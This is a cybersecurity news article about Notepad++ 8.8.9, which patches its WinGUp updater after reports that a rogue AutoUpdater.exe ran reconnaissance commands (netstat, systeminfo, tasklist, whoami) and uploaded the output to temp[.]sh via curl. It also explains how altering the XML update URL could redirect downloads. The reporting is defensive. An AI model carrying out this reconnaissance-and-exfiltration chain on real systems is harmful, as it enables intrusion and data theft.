Notepad++ Fixes WinGUp Vulnerability Exploited to Deliver Reconnaissance Malware
Notepad++ has released version 8.8.9 to remediate a weakness in its WinGUp (GUP.exe) update mechanism. Researchers and users had reported incidents in which the updater, instead of fetching a legitimate installer, downloaded and executed a foreign executable from the temporary directory. As a result, an unexpected file—%Temp%\AutoUpdater.exe—appeared on affected systems, where it conducted system reconnaissance and attempted to exfiltrate collected data.
The first warning sign surfaced in a thread on the Notepad++ community forum. According to one user, the rogue AutoUpdater.exe executed commands such as netstat -ano, systeminfo, tasklist, and whoami, redirected the output into a file named a.txt, and then uploaded it to the temp[.]sh service via curl.exe. Since WinGUp relies on the libcurl library rather than an external curl.exe binary and is not designed to perform such data collection, forum participants suspected either the installation of a tampered Notepad++ build or interception and manipulation of update traffic.
The interception scenario appears technically plausible. When checking for updates, Notepad++ requests https://notepad-plus-plus.org/update/getDownloadUrl.php?version=, and the server responds with an XML file containing a field that specifies the installer URL. If an attacker is able to interfere with this delivery chain and alter the URL in the field, the updater will download whatever it is instructed to retrieve, rather than the expected installer.
Against this backdrop, security expert Kevin Beaumont reported that he was aware of at least three organizations where incidents were linked to installed instances of Notepad++. According to him, these environments showed signs of “hands-on keyboard” activity—manual reconnaissance already taking place inside the network—and the affected organizations had business ties to East Asia, suggesting a targeted operation rather than indiscriminate noise. At the same time, Beaumont also pointed to a more mundane explanation: the distribution of trojanized builds via malicious advertisements and counterfeit download pages, a recurring risk for widely used utilities.
In response, Notepad++ developer Don Ho initially released version 8.8.8 on November 18 to reduce exposure by restricting updates to downloads hosted exclusively on GitHub. With version 8.8.9, released on December 9, stronger safeguards were introduced: WinGUp now verifies both the digital signature and the certificate of the downloaded installer, aborting the update process if validation fails. The project team emphasized that the investigation into the root cause of the traffic substitution is still ongoing.
Users are advised to upgrade to version 8.8.9 and to obtain installers solely from official sources. The advisory also reiterates that since version 8.8.7, all official binaries and installers have been signed with a valid certificate, and that anyone who previously installed a custom root certificate for legacy use cases should remove it to avoid unnecessarily expanding the attack surface.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
